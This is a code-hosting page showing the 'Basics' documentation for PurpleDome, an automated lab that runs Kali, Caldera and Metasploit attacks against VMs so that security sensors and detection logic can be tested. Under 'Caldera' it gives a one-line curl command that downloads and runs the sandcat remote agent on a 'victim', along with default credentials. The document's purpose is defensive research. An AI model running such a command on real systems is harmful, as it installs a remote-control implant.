archive
/
PurpleDome
mirror of https://github.com/avast/PurpleDome
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
You cannot select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
develop
polishing2
presentation_gpn_2022
more_unit_tests
extending_page
main
caldera_4
Branches Tags
${ item.name }
Create tag ${ searchTerm }
Create branch ${ searchTerm }
from 'e7a3c3596f'
${ noResults }
PurpleDome/doc/source/basics/background.rst

154 lines
4.4 KiB
ReStructuredText
Raw Blame History

======
Basics
======
Purple Dome is a simulated and automated environment to experiment with hacking - and defense.
PurpleDome is relevant for you:
* If you develop sensors for bolt on security
* If you want to test detection logic for your bolt on security
* If you want to stress test mitigation around your vulnerable apps
* Experiment with hardening your OS or software
* Want to forensically analyse a system after an attack
* Do some blue team exercises
* Want to train ML on data from real attacks
PurpleDome simulates a small busniess network. It generates an attacker VM and target VMs. Automated attacks are then run against the targets.
Depending on which sensors you picked you will get their logs. And the logs from the attacks. Perfect to compare them side-by-side.
Attacks are written as small plugins and control pre-installed tools:
* Kali command line tools
* Caldera commands
* Metasploit
That way your experiments focus on behaviour detection. And not on whack-a-mole games with malware samples.
-------------------
Features
========
* Linux and Windows targets
* VM controller abstracted as plugins
* Local vagrant based (debug and development)
* Cloud based
* Attacks as plugins controlling
* Caldera attacks
* Kali attacks
* Metasploit attacks
* Data collection: Attack log and sensor data in parallel with timestamps for matching events
* Vulnerability plugins: Modify the targets before the attack
* Sensor plugins: Write a simple wrapper around your sensor and integrate it into the experiments
Components
==========
The command line tools are the way you will interact with Purple Dome. Those are described in the *CLI* chapter.
The experiments are configured in YAML files, the format is described in the *configuration* chapter. You will also want to create some target VMs. You can do this manually or use Vagrant. Vagrant makes it simple to create Linux targets. Windows targets (with some start configuration) are harder and have an own chapter.
If you want to modify Purple Dome and contribute to it I can point you to the *Extending* chapter. Thanks to a plugin interface this is quite simple.
TODO: What sensors are pre-installed ?
TODO: How to attack it ?
TODO: How to contact the servers (ssh/...) ? Scriptable
TODO: How to run it without sudo ?
TODO: Which data is collected ? How to access it ? How to get data dumps out ?
TODO: Add Linux Server
TODO: Add Mac Server
Data aggregator
---------------
We currently can use logstash
There are several options for data aggregators:
* Fleet OSQuery aggregator: https://github.com/kolide/fleet
* The Hive
Sensors on Targets (most are Windows)
-------------------------------------
Those sensors are not integrated but could be nice to play with:
Palantir Windows Event forwarding: https://github.com/palantir/windows-event-forwarding
Autorun monitoring: https://github.com/palantir/windows-event-forwarding/tree/master/AutorunsToWinEventLog
Palantir OSquery: https://github.com/palantir/osquery-configuration
SwiftOnSecurity Sysmon config: https://github.com/SwiftOnSecurity/sysmon-config
Palantir OSQuery is mixed OS: Windows/Mac Endpoints, Linux Servers
Caldera
-------
Attack framework.
Starting: *python3 server.py --insecure*
Web UI on *http://localhost:8888/*
Credentials: *red/admin*
Documentation: Documentation: https://caldera.readthedocs.io/en/latest/
Installing client on victim (Linux):
server="http://192.168.178.45:8888";curl -s -X POST -H "file:sandcat.go" -H "platform:linux" $server/file/download > sandcat.go;chmod +x sandcat.go;./sandcat.go -server $server -group red -v
Filebeat
--------
Filebeat has a set of modules:
https://www.elastic.co/guide/en/beats/filebeat/6.8/filebeat-modules-overview.html
List modules: *filebeat modules list*
%% TODO: Add OSQueryD https://osquery.readthedocs.io/en/latest/introduction/using-osqueryd/
Logstash
--------
Logstash uses all .conf files in /etc/logstash/conf.d
https://www.elastic.co/guide/en/logstash/current/config-setting-files.html
Alternative: The Hive
---------------------
Sander Spierenburg (SOC Teamlead) seems to be interested in The Hive. So it is back in the game
Repos
-----
* The main part: https://git.int.avast.com/ai-research/purpledome
* Caldera fork to fix bugs: TBD
* Caldera Plugin for statistics: <add public git/avast folder>
Links
-----
* Others detecting this kind of things
- https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/
Reference in New Issue View Git Blame Copy Permalink